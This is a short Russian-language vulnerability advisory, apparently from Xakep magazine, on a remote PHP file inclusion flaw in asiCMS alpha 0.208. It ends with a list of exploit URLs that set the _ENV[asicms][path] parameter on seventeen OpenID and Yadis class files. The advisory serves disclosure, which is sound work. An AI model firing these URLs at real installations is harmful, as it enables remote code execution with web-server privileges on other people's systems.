Хакер #305. Многошаговые SQL-инъекции
Программа: asiCMS alpha 0.208
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценариями classes/Auth/OpenID/Association.php, classes/Auth/OpenID/BigMath.php,
classes/Auth/OpenID/DiffieHellman.php, classes/Auth/OpenID/DumbStore.php,
classes/Auth/OpenID/Extension.php, classes/Auth/OpenID/FileStore.php, classes/Auth/OpenID/HMAC.php,
classes/Auth/OpenID/MemcachedStore.php, classes/Auth/OpenID/Message.php, classes/Auth/OpenID/Nonce.php,
classes/Auth/OpenID/SQLStore.php, classes/Auth/OpenID/SReg.php, classes/Auth/OpenID/TrustRoot.php,
classes/Auth/OpenID/URINorm.php, classes/Auth/Yadis/XRDS.php, classes/Auth/Yadis/XRI.php
и classes/Auth/Yadis/XRIRes.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=